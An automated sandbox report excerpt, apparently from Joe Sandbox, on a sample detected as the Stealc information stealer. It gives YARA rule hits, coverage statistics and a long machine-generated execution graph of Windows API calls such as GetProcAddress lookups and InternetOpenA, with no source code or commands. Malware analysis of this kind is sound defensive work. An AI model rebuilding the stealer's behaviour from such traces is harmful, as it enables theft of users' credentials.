                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2208867559.0000000001C9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2167723747.0000000005830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:8.2%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.2%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
lstrcpy 13523->13524 13525 e55eb5 13524->13525 14752 e51a10 13525->14752 13527 e55eba 13528 e5a740 lstrcpy 13527->13528 13529 e55ed6 13528->13529 15096 e44fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13529->15096 13531 e55edb 13532 e41590 lstrcpy 13531->13532 13533 e55f5b 13532->13533 15103 e50740 13533->15103 13535 e55f60 13536 e5a740 lstrcpy 13535->13536 13537 e55f86 13536->13537 13538 e41590 lstrcpy 13537->13538 13539 e55f9a 13538->13539 13540 e45960 34 API calls 13539->13540 13635 e445d1 RtlAllocateHeap 13634->13635 13638 e44621 VirtualProtect 13635->13638 13638->13283 13639->13370 13641 e410c2 codecvt 13640->13641 13642 e410fd 13641->13642 13643 e410e2 VirtualFree 13641->13643 13642->13400 13643->13642 13645 e41233 GlobalMemoryStatusEx 13644->13645 13645->13403 13646->13427 13648 e5a7c2 13647->13648 13649 e5a7ec 13648->13649 13650 e5a7da lstrcpy 13648->13650 13649->13432 13650->13649 13652 e5a740 lstrcpy 13651->13652 13653 e56833 13652->13653 13654 e5a9b0 4 API calls 13653->13654 13655 e56845 13654->13655 13656 e5a8a0 lstrcpy 13655->13656 13657 e5684e 13656->13657 13658 e5a9b0 4 API calls 13657->13658 13659 e56867 13658->13659 13660 e5a8a0 lstrcpy 13659->13660 13661 e56870 13660->13661 13662 e5a9b0 4 API calls 13661->13662 13663 e5688a 13662->13663 13664 e5a8a0 lstrcpy 13663->13664 13665 e56893 13664->13665 13666 e5a9b0 4 API calls 13665->13666 13667 e568ac 13666->13667 13668 e5a8a0 lstrcpy 13667->13668 13669 e568b5 13668->13669 13670 e5a9b0 4 API calls 13669->13670 13671 e568cf 13670->13671 13672 e5a8a0 lstrcpy 13671->13672 13673 e568d8 13672->13673 13674 e5a9b0 4 API calls 13673->13674 13675 e568f3 13674->13675 13676 e5a8a0 lstrcpy 13675->13676 13677 e568fc 13676->13677 13678 e5a7a0 lstrcpy 13677->13678 13679 e56910 13678->13679 13679->13439 13681 e5a812 13680->13681 13681->13442 13683 e5a83f 13682->13683 13684 e55b54 13683->13684 13685 e5a87b lstrcpy 13683->13685 13684->13452 13685->13684 13687 e5a8a0 lstrcpy 13686->13687 13688 e56443 13687->13688 13689 
e5a8a0 lstrcpy 13688->13689 13690 e56455 13689->13690 13691 e5a8a0 lstrcpy 13690->13691 13692 e56467 13691->13692 13693 e5a8a0 lstrcpy 13692->13693 13694 e55b86 13693->13694 13694->13458 13696 e445c0 2 API calls 13695->13696 13697 e426b4 13696->13697 13698 e445c0 2 API calls 13697->13698 13699 e426d7 13698->13699 13700 e445c0 2 API calls 13699->13700 13701 e426f0 13700->13701 13702 e445c0 2 API calls 13701->13702 13703 e42709 13702->13703 13704 e445c0 2 API calls 13703->13704 13705 e42736 13704->13705 13706 e445c0 2 API calls 13705->13706 13707 e4274f 13706->13707 13708 e445c0 2 API calls 13707->13708 13709 e42768 13708->13709 13710 e445c0 2 API calls 13709->13710 13711 e42795 13710->13711 13712 e445c0 2 API calls 13711->13712 13713 e427ae 13712->13713 13714 e445c0 2 API calls 13713->13714 13715 e427c7 13714->13715 13716 e445c0 2 API calls 13715->13716 13717 e427e0 13716->13717 13718 e445c0 2 API calls 13717->13718 13719 e427f9 13718->13719 13720 e445c0 2 API calls 13719->13720 13721 e42812 13720->13721 13722 e445c0 2 API calls 13721->13722 13723 e4282b 13722->13723 13724 e445c0 2 API calls 13723->13724 13725 e42844 13724->13725 13726 e445c0 2 API calls 13725->13726 13727 e4285d 13726->13727 13728 e445c0 2 API calls 13727->13728 13729 e42876 13728->13729 13730 e445c0 2 API calls 13729->13730 13731 e4288f 13730->13731 13732 e445c0 2 API calls 13731->13732 13733 e428a8 13732->13733 13734 e445c0 2 API calls 13733->13734 13735 e428c1 13734->13735 13736 e445c0 2 API calls 13735->13736 13737 e428da 13736->13737 13738 e445c0 2 API calls 13737->13738 13739 e428f3 13738->13739 13740 e445c0 2 API calls 13739->13740 13741 e4290c 13740->13741 13742 e445c0 2 API calls 13741->13742 13743 e42925 13742->13743 13744 e445c0 2 API calls 13743->13744 13745 e4293e 13744->13745 13746 e445c0 2 API calls 13745->13746 13747 e42957 13746->13747 13748 e445c0 2 API calls 13747->13748 13749 e42970 13748->13749 13750 e445c0 2 API calls 13749->13750 13751 e42989 13750->13751 13752 e445c0 2 API 
calls 13751->13752 13753 e429a2 13752->13753 13754 e445c0 2 API calls 13753->13754 13755 e429bb 13754->13755 13756 e445c0 2 API calls 13755->13756 13757 e429d4 13756->13757 13758 e445c0 2 API calls 13757->13758 13759 e429ed 13758->13759 13760 e445c0 2 API calls 13759->13760 13761 e42a06 13760->13761 13762 e445c0 2 API calls 13761->13762 13763 e42a1f 13762->13763 13764 e445c0 2 API calls 13763->13764 13765 e42a38 13764->13765 13766 e445c0 2 API calls 13765->13766 13767 e42a51 13766->13767 13768 e445c0 2 API calls 13767->13768 13769 e42a6a 13768->13769 13770 e445c0 2 API calls 13769->13770 13771 e42a83 13770->13771 13772 e445c0 2 API calls 13771->13772 13773 e42a9c 13772->13773 13774 e445c0 2 API calls 13773->13774 13775 e42ab5 13774->13775 13776 e445c0 2 API calls 13775->13776 13777 e42ace 13776->13777 13778 e445c0 2 API calls 13777->13778 13779 e42ae7 13778->13779 13780 e445c0 2 API calls 13779->13780 13781 e42b00 13780->13781 13782 e445c0 2 API calls 13781->13782 13783 e42b19 13782->13783 13784 e445c0 2 API calls 13783->13784 13785 e42b32 13784->13785 13786 e445c0 2 API calls 13785->13786 13787 e42b4b 13786->13787 13788 e445c0 2 API calls 13787->13788 13789 e42b64 13788->13789 13790 e445c0 2 API calls 13789->13790 13791 e42b7d 13790->13791 13792 e445c0 2 API calls 13791->13792 13793 e42b96 13792->13793 13794 e445c0 2 API calls 13793->13794 13795 e42baf 13794->13795 13796 e445c0 2 API calls 13795->13796 13797 e42bc8 13796->13797 13798 e445c0 2 API calls 13797->13798 13799 e42be1 13798->13799 13800 e445c0 2 API calls 13799->13800 13801 e42bfa 13800->13801 13802 e445c0 2 API calls 13801->13802 13803 e42c13 13802->13803 13804 e445c0 2 API calls 13803->13804 13805 e42c2c 13804->13805 13806 e445c0 2 API calls 13805->13806 13807 e42c45 13806->13807 13808 e445c0 2 API calls 13807->13808 13809 e42c5e 13808->13809 13810 e445c0 2 API calls 13809->13810 13811 e42c77 13810->13811 13812 e445c0 2 API calls 13811->13812 13813 e42c90 13812->13813 13814 e445c0 2 API calls 
13813->13814 13815 e42ca9 13814->13815 13816 e445c0 2 API calls 13815->13816 13817 e42cc2 13816->13817 13818 e445c0 2 API calls 13817->13818 13819 e42cdb 13818->13819 13820 e445c0 2 API calls 13819->13820 13821 e42cf4 13820->13821 13822 e445c0 2 API calls 13821->13822 13823 e42d0d 13822->13823 13824 e445c0 2 API calls 13823->13824 13825 e42d26 13824->13825 13826 e445c0 2 API calls 13825->13826 13827 e42d3f 13826->13827 13828 e445c0 2 API calls 13827->13828 13829 e42d58 13828->13829 13830 e445c0 2 API calls 13829->13830 13831 e42d71 13830->13831 13832 e445c0 2 API calls 13831->13832 13833 e42d8a 13832->13833 13834 e445c0 2 API calls 13833->13834 13835 e42da3 13834->13835 13836 e445c0 2 API calls 13835->13836 13837 e42dbc 13836->13837 13838 e445c0 2 API calls 13837->13838 13839 e42dd5 13838->13839 13840 e445c0 2 API calls 13839->13840 13841 e42dee 13840->13841 13842 e445c0 2 API calls 13841->13842 13843 e42e07 13842->13843 13844 e445c0 2 API calls 13843->13844 13845 e42e20 13844->13845 13846 e445c0 2 API calls 13845->13846 13847 e42e39 13846->13847 13848 e445c0 2 API calls 13847->13848 13849 e42e52 13848->13849 13850 e445c0 2 API calls 13849->13850 13851 e42e6b 13850->13851 13852 e445c0 2 API calls 13851->13852 13853 e42e84 13852->13853 13854 e445c0 2 API calls 13853->13854 13855 e42e9d 13854->13855 13856 e445c0 2 API calls 13855->13856 13857 e42eb6 13856->13857 13858 e445c0 2 API calls 13857->13858 13859 e42ecf 13858->13859 13860 e445c0 2 API calls 13859->13860 13861 e42ee8 13860->13861 13862 e445c0 2 API calls 13861->13862 13863 e42f01 13862->13863 13864 e445c0 2 API calls 13863->13864 13865 e42f1a 13864->13865 13866 e445c0 2 API calls 13865->13866 13867 e42f33 13866->13867 13868 e445c0 2 API calls 13867->13868 13869 e42f4c 13868->13869 13870 e445c0 2 API calls 13869->13870 13871 e42f65 13870->13871 13872 e445c0 2 API calls 13871->13872 13873 e42f7e 13872->13873 13874 e445c0 2 API calls 13873->13874 13875 e42f97 13874->13875 13876 e445c0 2 API calls 13875->13876 
13877 e42fb0 13876->13877 13878 e445c0 2 API calls 13877->13878 13879 e42fc9 13878->13879 13880 e445c0 2 API calls 13879->13880 13881 e42fe2 13880->13881 13882 e445c0 2 API calls 13881->13882 13883 e42ffb 13882->13883 13884 e445c0 2 API calls 13883->13884 13885 e43014 13884->13885 13886 e445c0 2 API calls 13885->13886 13887 e4302d 13886->13887 13888 e445c0 2 API calls 13887->13888 13889 e43046 13888->13889 13890 e445c0 2 API calls 13889->13890 13891 e4305f 13890->13891 13892 e445c0 2 API calls 13891->13892 13893 e43078 13892->13893 13894 e445c0 2 API calls 13893->13894 13895 e43091 13894->13895 13896 e445c0 2 API calls 13895->13896 13897 e430aa 13896->13897 13898 e445c0 2 API calls 13897->13898 13899 e430c3 13898->13899 13900 e445c0 2 API calls 13899->13900 13901 e430dc 13900->13901 13902 e445c0 2 API calls 13901->13902 13903 e430f5 13902->13903 13904 e445c0 2 API calls 13903->13904 13905 e4310e 13904->13905 13906 e445c0 2 API calls 13905->13906 13907 e43127 13906->13907 13908 e445c0 2 API calls 13907->13908 13909 e43140 13908->13909 13910 e445c0 2 API calls 13909->13910 13911 e43159 13910->13911 13912 e445c0 2 API calls 13911->13912 13913 e43172 13912->13913 13914 e445c0 2 API calls 13913->13914 13915 e4318b 13914->13915 13916 e445c0 2 API calls 13915->13916 13917 e431a4 13916->13917 13918 e445c0 2 API calls 13917->13918 13919 e431bd 13918->13919 13920 e445c0 2 API calls 13919->13920 13921 e431d6 13920->13921 13922 e445c0 2 API calls 13921->13922 13923 e431ef 13922->13923 13924 e445c0 2 API calls 13923->13924 13925 e43208 13924->13925 13926 e445c0 2 API calls 13925->13926 13927 e43221 13926->13927 13928 e445c0 2 API calls 13927->13928 13929 e4323a 13928->13929 13930 e445c0 2 API calls 13929->13930 13931 e43253 13930->13931 13932 e445c0 2 API calls 13931->13932 13933 e4326c 13932->13933 13934 e445c0 2 API calls 13933->13934 13935 e43285 13934->13935 13936 e445c0 2 API calls 13935->13936 13937 e4329e 13936->13937 13938 e445c0 2 API calls 13937->13938 13939 e432b7 
13938->13939 13940 e445c0 2 API calls 13939->13940 13941 e432d0 13940->13941 13942 e445c0 2 API calls 13941->13942 13943 e432e9 13942->13943 13944 e445c0 2 API calls 13943->13944 13945 e43302 13944->13945 13946 e445c0 2 API calls 13945->13946 13947 e4331b 13946->13947 13948 e445c0 2 API calls 13947->13948 13949 e43334 13948->13949 13950 e445c0 2 API calls 13949->13950 13951 e4334d 13950->13951 13952 e445c0 2 API calls 13951->13952 13953 e43366 13952->13953 13954 e445c0 2 API calls 13953->13954 13955 e4337f 13954->13955 13956 e445c0 2 API calls 13955->13956 13957 e43398 13956->13957 13958 e445c0 2 API calls 13957->13958 13959 e433b1 13958->13959 13960 e445c0 2 API calls 13959->13960 13961 e433ca 13960->13961 13962 e445c0 2 API calls 13961->13962 13963 e433e3 13962->13963 13964 e445c0 2 API calls 13963->13964 13965 e433fc 13964->13965 13966 e445c0 2 API calls 13965->13966 13967 e43415 13966->13967 13968 e445c0 2 API calls 13967->13968 13969 e4342e 13968->13969 13970 e445c0 2 API calls 13969->13970 13971 e43447 13970->13971 13972 e445c0 2 API calls 13971->13972 13973 e43460 13972->13973 13974 e445c0 2 API calls 13973->13974 13975 e43479 13974->13975 13976 e445c0 2 API calls 13975->13976 13977 e43492 13976->13977 13978 e445c0 2 API calls 13977->13978 13979 e434ab 13978->13979 13980 e445c0 2 API calls 13979->13980 13981 e434c4 13980->13981 13982 e445c0 2 API calls 13981->13982 13983 e434dd 13982->13983 13984 e445c0 2 API calls 13983->13984 13985 e434f6 13984->13985 13986 e445c0 2 API calls 13985->13986 13987 e4350f 13986->13987 13988 e445c0 2 API calls 13987->13988 13989 e43528 13988->13989 13990 e445c0 2 API calls 13989->13990 13991 e43541 13990->13991 13992 e445c0 2 API calls 13991->13992 13993 e4355a 13992->13993 13994 e445c0 2 API calls 13993->13994 13995 e43573 13994->13995 13996 e445c0 2 API calls 13995->13996 13997 e4358c 13996->13997 13998 e445c0 2 API calls 13997->13998 13999 e435a5 13998->13999 14000 e445c0 2 API calls 13999->14000 14001 e435be 14000->14001 
14002 e445c0 2 API calls 14001->14002 14003 e435d7 14002->14003 14004 e445c0 2 API calls 14003->14004 14005 e435f0 14004->14005 14006 e445c0 2 API calls 14005->14006 14007 e43609 14006->14007 14008 e445c0 2 API calls 14007->14008 14009 e43622 14008->14009 14010 e445c0 2 API calls 14009->14010 14011 e4363b 14010->14011 14012 e445c0 2 API calls 14011->14012 14013 e43654 14012->14013 14014 e445c0 2 API calls 14013->14014 14015 e4366d 14014->14015 14016 e445c0 2 API calls 14015->14016 14017 e43686 14016->14017 14018 e445c0 2 API calls 14017->14018 14019 e4369f 14018->14019 14020 e445c0 2 API calls 14019->14020 14021 e436b8 14020->14021 14022 e445c0 2 API calls 14021->14022 14023 e436d1 14022->14023 14024 e445c0 2 API calls 14023->14024 14025 e436ea 14024->14025 14026 e445c0 2 API calls 14025->14026 14027 e43703 14026->14027 14028 e445c0 2 API calls 14027->14028 14029 e4371c 14028->14029 14030 e445c0 2 API calls 14029->14030 14031 e43735 14030->14031 14032 e445c0 2 API calls 14031->14032 14033 e4374e 14032->14033 14034 e445c0 2 API calls 14033->14034 14035 e43767 14034->14035 14036 e445c0 2 API calls 14035->14036 14037 e43780 14036->14037 14038 e445c0 2 API calls 14037->14038 14039 e43799 14038->14039 14040 e445c0 2 API calls 14039->14040 14041 e437b2 14040->14041 14042 e445c0 2 API calls 14041->14042 14043 e437cb 14042->14043 14044 e445c0 2 API calls 14043->14044 14045 e437e4 14044->14045 14046 e445c0 2 API calls 14045->14046 14047 e437fd 14046->14047 14048 e445c0 2 API calls 14047->14048 14049 e43816 14048->14049 14050 e445c0 2 API calls 14049->14050 14051 e4382f 14050->14051 14052 e445c0 2 API calls 14051->14052 14053 e43848 14052->14053 14054 e445c0 2 API calls 14053->14054 14055 e43861 14054->14055 14056 e445c0 2 API calls 14055->14056 14057 e4387a 14056->14057 14058 e445c0 2 API calls 14057->14058 14059 e43893 14058->14059 14060 e445c0 2 API calls 14059->14060 14061 e438ac 14060->14061 14062 e445c0 2 API calls 14061->14062 14063 e438c5 14062->14063 14064 e445c0 2 
API calls 14063->14064 14065 e438de 14064->14065 14066 e445c0 2 API calls 14065->14066 14067 e438f7 14066->14067 14068 e445c0 2 API calls 14067->14068 14069 e43910 14068->14069 14070 e445c0 2 API calls 14069->14070 14071 e43929 14070->14071 14072 e445c0 2 API calls 14071->14072 14073 e43942 14072->14073 14074 e445c0 2 API calls 14073->14074 14075 e4395b 14074->14075 14076 e445c0 2 API calls 14075->14076 14077 e43974 14076->14077 14078 e445c0 2 API calls 14077->14078 14079 e4398d 14078->14079 14080 e445c0 2 API calls 14079->14080 14081 e439a6 14080->14081 14082 e445c0 2 API calls 14081->14082 14083 e439bf 14082->14083 14084 e445c0 2 API calls 14083->14084 14085 e439d8 14084->14085 14086 e445c0 2 API calls 14085->14086 14087 e439f1 14086->14087 14088 e445c0 2 API calls 14087->14088 14089 e43a0a 14088->14089 14090 e445c0 2 API calls 14089->14090 14091 e43a23 14090->14091 14092 e445c0 2 API calls 14091->14092 14093 e43a3c 14092->14093 14094 e445c0 2 API calls 14093->14094 14095 e43a55 14094->14095 14096 e445c0 2 API calls 14095->14096 14097 e43a6e 14096->14097 14098 e445c0 2 API calls 14097->14098 14099 e43a87 14098->14099 14100 e445c0 2 API calls 14099->14100 14101 e43aa0 14100->14101 14102 e445c0 2 API calls 14101->14102 14103 e43ab9 14102->14103 14104 e445c0 2 API calls 14103->14104 14105 e43ad2 14104->14105 14106 e445c0 2 API calls 14105->14106 14107 e43aeb 14106->14107 14108 e445c0 2 API calls 14107->14108 14109 e43b04 14108->14109 14110 e445c0 2 API calls 14109->14110 14111 e43b1d 14110->14111 14112 e445c0 2 API calls 14111->14112 14113 e43b36 14112->14113 14114 e445c0 2 API calls 14113->14114 14115 e43b4f 14114->14115 14116 e445c0 2 API calls 14115->14116 14117 e43b68 14116->14117 14118 e445c0 2 API calls 14117->14118 14119 e43b81 14118->14119 14120 e445c0 2 API calls 14119->14120 14121 e43b9a 14120->14121 14122 e445c0 2 API calls 14121->14122 14123 e43bb3 14122->14123 14124 e445c0 2 API calls 14123->14124 14125 e43bcc 14124->14125 14126 e445c0 2 API calls 
14125->14126 14127 e43be5 14126->14127 14128 e445c0 2 API calls 14127->14128 14129 e43bfe 14128->14129 14130 e445c0 2 API calls 14129->14130 14131 e43c17 14130->14131 14132 e445c0 2 API calls 14131->14132 14133 e43c30 14132->14133 14134 e445c0 2 API calls 14133->14134 14135 e43c49 14134->14135 14136 e445c0 2 API calls 14135->14136 14137 e43c62 14136->14137 14138 e445c0 2 API calls 14137->14138 14139 e43c7b 14138->14139 14140 e445c0 2 API calls 14139->14140 14141 e43c94 14140->14141 14142 e445c0 2 API calls 14141->14142 14143 e43cad 14142->14143 14144 e445c0 2 API calls 14143->14144 14145 e43cc6 14144->14145 14146 e445c0 2 API calls 14145->14146 14147 e43cdf 14146->14147 14148 e445c0 2 API calls 14147->14148 14149 e43cf8 14148->14149 14150 e445c0 2 API calls 14149->14150 14151 e43d11 14150->14151 14152 e445c0 2 API calls 14151->14152 14153 e43d2a 14152->14153 14154 e445c0 2 API calls 14153->14154 14155 e43d43 14154->14155 14156 e445c0 2 API calls 14155->14156 14157 e43d5c 14156->14157 14158 e445c0 2 API calls 14157->14158 14159 e43d75 14158->14159 14160 e445c0 2 API calls 14159->14160 14161 e43d8e 14160->14161 14162 e445c0 2 API calls 14161->14162 14163 e43da7 14162->14163 14164 e445c0 2 API calls 14163->14164 14165 e43dc0 14164->14165 14166 e445c0 2 API calls 14165->14166 14167 e43dd9 14166->14167 14168 e445c0 2 API calls 14167->14168 14169 e43df2 14168->14169 14170 e445c0 2 API calls 14169->14170 14171 e43e0b 14170->14171 14172 e445c0 2 API calls 14171->14172 14173 e43e24 14172->14173 14174 e445c0 2 API calls 14173->14174 14175 e43e3d 14174->14175 14176 e445c0 2 API calls 14175->14176 14177 e43e56 14176->14177 14178 e445c0 2 API calls 14177->14178 14179 e43e6f 14178->14179 14180 e445c0 2 API calls 14179->14180 14181 e43e88 14180->14181 14182 e445c0 2 API calls 14181->14182 14183 e43ea1 14182->14183 14184 e445c0 2 API calls 14183->14184 14185 e43eba 14184->14185 14186 e445c0 2 API calls 14185->14186 14187 e43ed3 14186->14187 14188 e445c0 2 API calls 14187->14188 
14189 e43eec 14188->14189 14190 e445c0 2 API calls 14189->14190 14191 e43f05 14190->14191 14192 e445c0 2 API calls 14191->14192 14193 e43f1e 14192->14193 14194 e445c0 2 API calls 14193->14194 14195 e43f37 14194->14195 14196 e445c0 2 API calls 14195->14196 14197 e43f50 14196->14197 14198 e445c0 2 API calls 14197->14198 14199 e43f69 14198->14199 14200 e445c0 2 API calls 14199->14200 14201 e43f82 14200->14201 14202 e445c0 2 API calls 14201->14202 14203 e43f9b 14202->14203 14204 e445c0 2 API calls 14203->14204 14205 e43fb4 14204->14205 14206 e445c0 2 API calls 14205->14206 14207 e43fcd 14206->14207 14208 e445c0 2 API calls 14207->14208 14209 e43fe6 14208->14209 14210 e445c0 2 API calls 14209->14210 14211 e43fff 14210->14211 14212 e445c0 2 API calls 14211->14212 14213 e44018 14212->14213 14214 e445c0 2 API calls 14213->14214 14215 e44031 14214->14215 14216 e445c0 2 API calls 14215->14216 14217 e4404a 14216->14217 14218 e445c0 2 API calls 14217->14218 14219 e44063 14218->14219 14220 e445c0 2 API calls 14219->14220 14221 e4407c 14220->14221 14222 e445c0 2 API calls 14221->14222 14223 e44095 14222->14223 14224 e445c0 2 API calls 14223->14224 14225 e440ae 14224->14225 14226 e445c0 2 API calls 14225->14226 14227 e440c7 14226->14227 14228 e445c0 2 API calls 14227->14228 14229 e440e0 14228->14229 14230 e445c0 2 API calls 14229->14230 14231 e440f9 14230->14231 14232 e445c0 2 API calls 14231->14232 14233 e44112 14232->14233 14234 e445c0 2 API calls 14233->14234 14235 e4412b 14234->14235 14236 e445c0 2 API calls 14235->14236 14237 e44144 14236->14237 14238 e445c0 2 API calls 14237->14238 14239 e4415d 14238->14239 14240 e445c0 2 API calls 14239->14240 14241 e44176 14240->14241 14242 e445c0 2 API calls 14241->14242 14243 e4418f 14242->14243 14244 e445c0 2 API calls 14243->14244 14245 e441a8 14244->14245 14246 e445c0 2 API calls 14245->14246 14247 e441c1 14246->14247 14248 e445c0 2 API calls 14247->14248 14249 e441da 14248->14249 14250 e445c0 2 API calls 14249->14250 14251 e441f3 
14250->14251 14252 e445c0 2 API calls 14251->14252 14253 e4420c 14252->14253 14254 e445c0 2 API calls 14253->14254 14255 e44225 14254->14255 14256 e445c0 2 API calls 14255->14256 14257 e4423e 14256->14257 14258 e445c0 2 API calls 14257->14258 14259 e44257 14258->14259 14260 e445c0 2 API calls 14259->14260 14261 e44270 14260->14261 14262 e445c0 2 API calls 14261->14262 14263 e44289 14262->14263 14264 e445c0 2 API calls 14263->14264 14265 e442a2 14264->14265 14266 e445c0 2 API calls 14265->14266 14267 e442bb 14266->14267 14268 e445c0 2 API calls 14267->14268 14269 e442d4 14268->14269 14270 e445c0 2 API calls 14269->14270 14271 e442ed 14270->14271 14272 e445c0 2 API calls 14271->14272 14273 e44306 14272->14273 14274 e445c0 2 API calls 14273->14274 14275 e4431f 14274->14275 14276 e445c0 2 API calls 14275->14276 14277 e44338 14276->14277 14278 e445c0 2 API calls 14277->14278 14279 e44351 14278->14279 14280 e445c0 2 API calls 14279->14280 14281 e4436a 14280->14281 14282 e445c0 2 API calls 14281->14282 14283 e44383 14282->14283 14284 e445c0 2 API calls 14283->14284 14285 e4439c 14284->14285 14286 e445c0 2 API calls 14285->14286 14287 e443b5 14286->14287 14288 e445c0 2 API calls 14287->14288 14289 e443ce 14288->14289 14290 e445c0 2 API calls 14289->14290 14291 e443e7 14290->14291 14292 e445c0 2 API calls 14291->14292 14293 e44400 14292->14293 14294 e445c0 2 API calls 14293->14294 14295 e44419 14294->14295 14296 e445c0 2 API calls 14295->14296 14297 e44432 14296->14297 14298 e445c0 2 API calls 14297->14298 14299 e4444b 14298->14299 14300 e445c0 2 API calls 14299->14300 14301 e44464 14300->14301 14302 e445c0 2 API calls 14301->14302 14303 e4447d 14302->14303 14304 e445c0 2 API calls 14303->14304 14305 e44496 14304->14305 14306 e445c0 2 API calls 14305->14306 14307 e444af 14306->14307 14308 e445c0 2 API calls 14307->14308 14309 e444c8 14308->14309 14310 e445c0 2 API calls 14309->14310 14311 e444e1 14310->14311 14312 e445c0 2 API calls 14311->14312 14313 e444fa 14312->14313 
14314 e445c0 2 API calls 14313->14314 14315 e44513 14314->14315 14316 e445c0 2 API calls 14315->14316 14317 e4452c 14316->14317 14318 e445c0 2 API calls 14317->14318 14319 e44545 14318->14319 14320 e445c0 2 API calls 14319->14320 14321 e4455e 14320->14321 14322 e445c0 2 API calls 14321->14322 14323 e44577 14322->14323 14324 e445c0 2 API calls 14323->14324 14325 e44590 14324->14325 14326 e445c0 2 API calls 14325->14326 14327 e445a9 14326->14327 14328 e59c10 14327->14328 14329 e5a036 8 API calls 14328->14329 14330 e59c20 43 API calls 14328->14330 14331 e5a146 14329->14331 14332 e5a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14329->14332 14330->14329 14333 e5a216 14331->14333 14334 e5a153 8 API calls 14331->14334 14332->14331 14335 e5a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14333->14335 14336 e5a298 14333->14336 14334->14333 14335->14336 14337 e5a2a5 6 API calls 14336->14337 14338 e5a337 14336->14338 14337->14338 14339 e5a344 9 API calls 14338->14339 14340 e5a41f 14338->14340 14339->14340 14341 e5a4a2 14340->14341 14342 e5a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14340->14342 14343 e5a4dc 14341->14343 14344 e5a4ab GetProcAddress GetProcAddress 14341->14344 14342->14341 14345 e5a515 14343->14345 14346 e5a4e5 GetProcAddress GetProcAddress 14343->14346 14344->14343 14347 e5a612 14345->14347 14348 e5a522 10 API calls 14345->14348 14346->14345 14349 e5a67d 14347->14349 14350 e5a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14347->14350 14348->14347 14351 e5a686 GetProcAddress 14349->14351 14352 e5a69e 14349->14352 14350->14349 14351->14352 14353 e5a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14352->14353 14354 e55ca3 14352->14354 14353->14354 14355 e41590 14354->14355 15474 e41670 14355->15474 14358 e5a7a0 lstrcpy 14359 e415b5 14358->14359 14360 e5a7a0 lstrcpy 14359->14360 14361 e415c7 14360->14361 14362 e5a7a0 lstrcpy 
14361->14362 14363 e415d9 14362->14363 14364 e5a7a0 lstrcpy 14363->14364 14365 e41663 14364->14365 14366 e55510 14365->14366 14367 e55521 14366->14367 14368 e5a820 2 API calls 14367->14368 14369 e5552e 14368->14369 14370 e5a820 2 API calls 14369->14370 14371 e5553b 14370->14371 14372 e5a820 2 API calls 14371->14372 14373 e55548 14372->14373 14374 e5a740 lstrcpy 14373->14374 14375 e55555 14374->14375 14376 e5a740 lstrcpy 14375->14376 14377 e55562 14376->14377 14378 e5a740 lstrcpy 14377->14378 14379 e5556f 14378->14379 14380 e5a740 lstrcpy 14379->14380 14400 e5557c 14380->14400 14381 e552c0 25 API calls 14381->14400 14382 e551f0 20 API calls 14382->14400 14383 e55643 StrCmpCA 14383->14400 14384 e556a0 StrCmpCA 14385 e557dc 14384->14385 14384->14400 14386 e5a8a0 lstrcpy 14385->14386 14387 e557e8 14386->14387 14388 e5a820 2 API calls 14387->14388 14391 e557f6 14388->14391 14389 e5a740 lstrcpy 14389->14400 14390 e5a820 lstrlen lstrcpy 14390->14400 14393 e5a820 2 API calls 14391->14393 14392 e55856 StrCmpCA 14394 e55991 14392->14394 14392->14400 14396 e55805 14393->14396 14395 e5a8a0 lstrcpy 14394->14395 14397 e5599d 14395->14397 14398 e41670 lstrcpy 14396->14398 14399 e5a820 2 API calls 14397->14399 14419 e55811 14398->14419 14401 e559ab 14399->14401 14400->14381 14400->14382 14400->14383 14400->14384 14400->14389 14400->14390 14400->14392 14402 e55a0b StrCmpCA 14400->14402 14406 e5a7a0 lstrcpy 14400->14406 14411 e41590 lstrcpy 14400->14411 14416 e5578a StrCmpCA 14400->14416 14418 e5593f StrCmpCA 14400->14418 14420 e5a8a0 lstrcpy 14400->14420 14403 e5a820 2 API calls 14401->14403 14404 e55a16 Sleep 14402->14404 14405 e55a28 14402->14405 14407 e559ba 14403->14407 14404->14400 14408 e5a8a0 lstrcpy 14405->14408 14406->14400 14409 e41670 lstrcpy 14407->14409 14410 e55a34 14408->14410 14409->14419 14412 e5a820 2 API calls 14410->14412 14411->14400 14413 e55a43 14412->14413 14414 e5a820 2 API calls 14413->14414 14415 e55a52 14414->14415 14417 e41670 lstrcpy 14415->14417 
14416->14400 14417->14419 14418->14400 14419->13473 14420->14400 14422 e57553 GetVolumeInformationA 14421->14422 14423 e5754c 14421->14423 14424 e57591 14422->14424 14423->14422 14425 e575fc GetProcessHeap RtlAllocateHeap 14424->14425 14426 e57619 14425->14426 14427 e57628 wsprintfA 14425->14427 14428 e5a740 lstrcpy 14426->14428 14429 e5a740 lstrcpy 14427->14429 14430 e55da7 14428->14430 14429->14430 14430->13494 14432 e5a7a0 lstrcpy 14431->14432 14433 e44899 14432->14433 15483 e447b0 14433->15483 14435 e448a5 14436 e5a740 lstrcpy 14435->14436 14437 e448d7 14436->14437 14438 e5a740 lstrcpy 14437->14438 14439 e448e4 14438->14439 14440 e5a740 lstrcpy 14439->14440 14441 e448f1 14440->14441 14442 e5a740 lstrcpy 14441->14442 14443 e448fe 14442->14443 14444 e5a740 lstrcpy 14443->14444 14445 e4490b InternetOpenA StrCmpCA 14444->14445 14446 e44944 14445->14446 14447 e44ecb InternetCloseHandle 14446->14447 15489 e58b60 14446->15489 14448 e44ee8 14447->14448 15504 e49ac0 CryptStringToBinaryA 14448->15504 14450 e44963 15497 e5a920 14450->15497 14453 e44976 14455 e5a8a0 lstrcpy 14453->14455 14460 e4497f 14455->14460 14456 e5a820 2 API calls 14457 e44f05 14456->14457 14458 e5a9b0 4 API calls 14457->14458 14461 e44f1b 14458->14461 